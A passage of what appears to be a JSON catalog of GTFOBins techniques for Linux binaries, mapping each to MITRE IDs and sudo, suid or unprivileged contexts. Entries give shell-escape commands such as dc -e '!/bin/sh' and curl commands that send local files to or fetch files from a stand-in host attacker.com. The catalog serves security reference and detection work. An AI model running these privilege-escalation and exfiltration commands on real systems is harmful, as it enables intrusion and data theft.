context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-read:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:file-write:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:library-load:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:1:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:upload:2:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:sudo","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:suid","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cut:file-read:0:unprivileged","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cut/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:file-write:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dash:shell:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:sudo","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:suid","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:date:file-read:0:unprivileged","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/date/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:sudo","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:suid","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dc:shell:0:unprivileged","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-read:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dd:file-write:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:sudo","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:suid","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:debugfs:shell:0:unprivileged","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/debugfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dhclient:shell:0:sudo","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dhclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dhclient:shell:0:unprivileged","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dhclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:sudo","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:suid","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dialog:file-read:0:unprivileged","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dialog/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:0:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:diff:file-read:1:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dig:file-read:0:sudo","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 